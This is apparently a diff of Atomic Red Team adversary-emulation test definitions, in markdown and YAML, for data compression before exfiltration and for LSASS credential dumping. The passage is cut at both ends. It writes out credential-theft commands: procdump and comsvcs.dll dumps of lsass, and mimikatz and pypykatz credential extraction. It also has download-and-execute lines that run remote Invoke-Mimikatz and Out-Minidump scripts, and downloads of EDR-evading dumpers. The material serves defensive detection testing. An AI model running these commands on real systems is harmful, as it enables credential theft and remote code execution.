- [Atomic Test #5 - Data Compressed - nix - tar Folder or File](#atomic-test-5---data-compressed---nix---tar-folder-or-file)
<br/>
## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | C:\*|
| output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip|
#### Run it with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
<br/>
<br/>
## Atomic Test #2 - Compress Data for Exfiltration With Rar
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | *.docx|
| output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_file}
```
<br/>
<br/>
## Atomic Test #3 - Data Compressed - nix - zip
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*|
| output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip|
#### Run it with `sh`!
```
zip #{output_file} #{input_files}
```
<br/>
<br/>
## Atomic Test #4 - Data Compressed - nix - gzip Single File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt|
#### Run it with `sh`!
```
gzip -f #{input_file}
```
<br/>
<br/>
## Atomic Test #5 - Data Compressed - nix - tar Folder or File
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
**Supported Platforms:** Linux, macOS
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | /tmp/victim-files/|
| output_file | File that should be output | Path | /tmp/victim-files.tar.gz|
#### Run it with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
<br/>
atomics/T1002/T1002.yaml
+98
View File
@@ -0,0 +1,98 @@
---
attack_technique: T1002
display_name: Data Compressed
atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: C:\*
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: C:\test\Data.zip
executor:
name: powershell
command: |
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
- name: Compress Data for Exfiltration With Rar
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration
supported_platforms:
- windows
input_arguments:
input_file:
description: Path that should be compressed into our output file
type: Path
default: "*.docx"
output_file:
description: Path where resulting compressed data should be placed
type: Path
default: exfilthis.rar
executor:
name: command_prompt
command: |
rar a -r #{output_file} #{input_file}
- name: Data Compressed - nix - zip
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
type: Path
default: /tmp/victim-files/*
output_file:
description: Path that should be output as a zip archive
type: Path
default: /tmp/victim-files.zip
executor:
name: sh
command: |
zip #{output_file} #{input_files}
- name: Data Compressed - nix - gzip Single File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file:
description: Path that should be compressed
type: Path
default: /tmp/victim-gzip.txt
executor:
name: sh
command: |
gzip -f #{input_file}
- name: Data Compressed - nix - tar Folder or File
description: |
An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression.
supported_platforms:
- linux
- macos
input_arguments:
input_file_folder:
description: Path that should be compressed
type: Path
default: /tmp/victim-files/
output_file:
description: File that should be output
type: Path
default: /tmp/victim-files.tar.gz
executor:
name: sh
command: |
tar -cvzf #{output_file} #{input_file_folder}
atomics/T1003.001/T1003.001.md
-654
View File
@@ -1,654 +0,0 @@
# T1003.001 - OS Credential Dumping: LSASS Memory
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1003/001)
<blockquote>Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* <code>procdump -ma lsass.exe lsass_dump</code>
Locally, mimikatz can be run using:
* <code>sekurlsa::Minidump lsassdump.dmp</code>
* <code>sekurlsa::logonPasswords</code>
Built-in Windows tools such as comsvcs.dll can also be used:
* <code>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump PID lsass.dmp full</code>(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</blockquote>
## Atomic Tests
- [Atomic Test #1 - Dump LSASS.exe Memory using ProcDump](#atomic-test-1---dump-lsassexe-memory-using-procdump)
- [Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll](#atomic-test-2---dump-lsassexe-memory-using-comsvcsdll)
- [Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking](#atomic-test-3---dump-lsassexe-memory-using-direct-system-calls-and-api-unhooking)
- [Atomic Test #4 - Dump LSASS.exe Memory using NanoDump](#atomic-test-4---dump-lsassexe-memory-using-nanodump)
- [Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-5---dump-lsassexe-memory-using-windows-task-manager)
- [Atomic Test #6 - Offline Credential Theft With Mimikatz](#atomic-test-6---offline-credential-theft-with-mimikatz)
- [Atomic Test #7 - LSASS read with pypykatz](#atomic-test-7---lsass-read-with-pypykatz)
- [Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1](#atomic-test-8---dump-lsassexe-memory-using-out-minidumpps1)
- [Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump](#atomic-test-9---create-mini-dump-of-lsassexe-using-procdump)
- [Atomic Test #10 - Powershell Mimikatz](#atomic-test-10---powershell-mimikatz)
- [Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe](#atomic-test-11---dump-lsass-with-net-5-createdumpexe)
- [Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs](#atomic-test-12---dump-lsassexe-using-imported-microsoft-dlls)
<br/>
## Atomic Test #1 - Dump LSASS.exe Memory using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #2 - Dump LSASS.exe Memory using comsvcs.dll
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #3 - Dump LSASS.exe Memory using direct system calls and API unhooking
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| dumpert_exe | Path of Dumpert executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;Outflank-Dumpert.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{dumpert_exe}
```
#### Cleanup Commands:
```cmd
del C:\windows\temp\dumpert.dmp >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
```
<br/>
<br/>
## Atomic Test #4 - Dump LSASS.exe Memory using NanoDump
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
**Supported Platforms:** Windows
**auto_generated_guid:** dddd4aca-bbed-46f0-984d-e4c5971c51ea
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
```
#### Cleanup Commands:
```cmd
del "%temp%\nanodump.dmp" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe)
##### Check Prereq Commands:
```powershell
if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
```
<br/>
<br/>
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
**Supported Platforms:** Windows
**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607
#### Run it with these steps!
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
<br/>
<br/>
## Atomic Test #6 - Offline Credential Theft With Mimikatz
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
**Supported Platforms:** Windows
**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path of the Lsass dump | Path | %tmp%&#92;lsass.DMP|
| mimikatz_exe | Path of the Mimikatz binary | String | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;x64&#92;mimikatz.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
```
#### Dependencies: Run with `powershell`!
##### Description: Mimikatz must exist on disk at specified location (#{mimikatz_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
```
##### Description: Lsass dump must exist at specified location (#{input_file})
##### Check Prereq Commands:
```powershell
cmd /c "if not exist #{input_file} (exit /b 1)"
```
##### Get Prereq Commands:
```powershell
Write-Host "Create the lsass dump manually using the steps in the previous test (Dump LSASS.exe Memory using Windows Task Manager)"
```
<br/>
<br/>
## Atomic Test #7 - LSASS read with pypykatz
Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa::
Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.
Successful execution of this test will display multiple useranames and passwords/hashes to the screen.
**Supported Platforms:** Windows
**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
pypykatz live lsa
```
#### Dependencies: Run with `command_prompt`!
##### Description: Computer must have python 3 installed
##### Check Prereq Commands:
```cmd
py -3 --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "Python 3 must be installed manually"
```
##### Description: Computer must have pip installed
##### Check Prereq Commands:
```cmd
py -3 -m pip --version >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
echo "PIP must be installed manually"
```
##### Description: pypykatz must be installed and part of PATH
##### Check Prereq Commands:
```cmd
pypykatz -h >nul 2>&1
exit /b %errorlevel%
```
##### Get Prereq Commands:
```cmd
pip install pypykatz
```
<br/>
<br/>
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1
The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure
powershell implementation that leverages the MiniDumpWriteDump Win32 API call.
Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump
```
#### Cleanup Commands:
```powershell
Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
```
<br/>
<br/>
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
**Supported Platforms:** Windows
**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass_dump.dmp|
| procdump_exe | Path of Procdump executable | Path | PathToAtomicsFolder&#92;T1003.001&#92;bin&#92;procdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
#{procdump_exe} -accepteula -mm lsass.exe #{output_file}
```
#### Cleanup Commands:
```cmd
del "#{output_file}" >nul 2> nul
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```powershell
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
## Atomic Test #10 - Powershell Mimikatz
Dumps credentials from memory via Powershell by invoking a remote mimikatz script.
If Mimikatz runs successfully you will see several usernames and hashes output to the screen.
Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution.
Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA"
**Supported Platforms:** Windows
**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe
This test uses the technique describe in this tweet
(https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
**Supported Platforms:** Windows
**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;dotnet-lsass.dmp|
| createdump_exe | Path of createdump.exe executable | Path | C:&#92;Program Files&#92;dotnet&#92;shared&#92;Microsoft.NETCore.App&#92;5.*.*&#92;createdump.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
echo "Createdump Path #{createdump_exe}"
$LSASS = tasklist | findstr "lsass"
$FIELDS = $LSASS -split "\s+"
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have createdump.exe from .Net 5
##### Check Prereq Commands:
```powershell
if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
```
<br/>
<br/>
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by
importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump
file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files.
Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp.
**Supported Platforms:** Windows
**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| xordump_exe | Path to xordump | Path | C:&#92;Windows&#92;Temp&#92;xordump.exe|
| output_file | Path where resulting dump should be placed | Path | C:&#92;Windows&#92;Temp&#92;lsass-xordump.t1003.001.dmp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
#{xordump_exe} -out #{output_file} -x 0x41
```
#### Cleanup Commands:
```powershell
Remove-Item #{output_file} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must have xordump.exe
##### Check Prereq Commands:
```powershell
if (Test-Path '#{xordump_exe}') {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe" -OutFile #{xordump_exe}
```
<br/>
atomics/T1003.001/T1003.001.yaml
-358
View File
@@ -1,358 +0,0 @@
attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
- name: Dump LSASS.exe Memory using ProcDump
auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
ProcDump.
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
supported_platforms:
- windows
input_arguments:
output_file:
description: Path where resulting dump should be placed
type: Path
default: C:\Windows\Temp\lsass_dump.dmp
procdump_exe:
description: Path of Procdump executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\procdump.exe
dependency_executor_name: powershell
dependencies:
- description: |
ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
prereq_command: |
if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
executor:
command: |
#{procdump_exe} -accepteula -ma lsass.exe #{output_file}
cleanup_command: |
del "#{output_file}" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
supported_platforms:
- windows
executor:
command: |
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
cleanup_command: |
Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection.
https://github.com/outflanknl/Dumpert
https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.
If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first.
supported_platforms:
- windows
input_arguments:
dumpert_exe:
description: Path of Dumpert executable
type: Path
default: PathToAtomicsFolder\T1003.001\bin\Outflank-Dumpert.exe
dependency_executor_name: powershell
dependencies:
- description: |
Dumpert executable must exist on disk at specified location (#{dumpert_exe})
prereq_command: |
if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe" -OutFile #{dumpert_exe}
executor:
command: |
#{dumpert_exe}
cleanup_command: |
del C:\windows\temp\dumpert.dmp >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using NanoDump
auto_generated_guid: dddd4aca-bbed-46f0-984d-e4c5971c51ea
description: |
The NanoDump tool uses syscalls and an invalid dump signature to avoid detection.
https://github.com/helpsystems/nanodump
Upon successful execution, you should find the nanondump.dmp file in the temp directory
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: |
NanoDump executable must exist on disk at specified location ($env:TEMP\nanodump.x64.exe)
prereq_command: |
if (Test-Path $env:TEMP\nanodump.x64.exe) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/helpsystems/nanodump/raw/84db0c1737bbe027431733c193cfacf59a07259b/compiled/nanodump.x64.exe" -OutFile "$env:TEMP\nanodump.x64.exe"
executor:
command: |
%temp%\nanodump.x64.exe -w "%temp%\nanodump.dmp"
cleanup_command: |
del "%temp%\nanodump.dmp" >nul 2> nul
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using Windows Task Manager
auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task
Manager and administrative permissions.
supported_platforms:
- windows
executor:
steps: |
1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
2. Select lsass.exe:
If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe
and select it for manipulation.
3. Dump lsass.exe memory:
Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
name: manual
- name: Offline Credential Theft With Mimikatz
auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023
description: |
The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with
Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands.
supported_platforms:
- windows
input_arguments:
input_file:
description: Path of the Lsass dump
type: Path
default: '%tmp%\lsass.DMP'
mimikatz_exe:
description: Path of the Mimikatz binary
type: String
default: PathToAtomicsFolder\T1003.001\bin\x64\mimikatz.exe
dependency_executor_name: powershell
dependencies:
- description: |
Mimikatz must exist on disk at specified location (#{mimikatz_exe})
prereq_command: |
if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing)
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$basePath = Split-Path #{mimikatz_exe} | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath
- description: |
Lsass dump must exist at specified location (#{input_file})
prereq_command: |
cmd /c "if not exist #{input_file} (exit /b 1)"
get_prereq_command: |
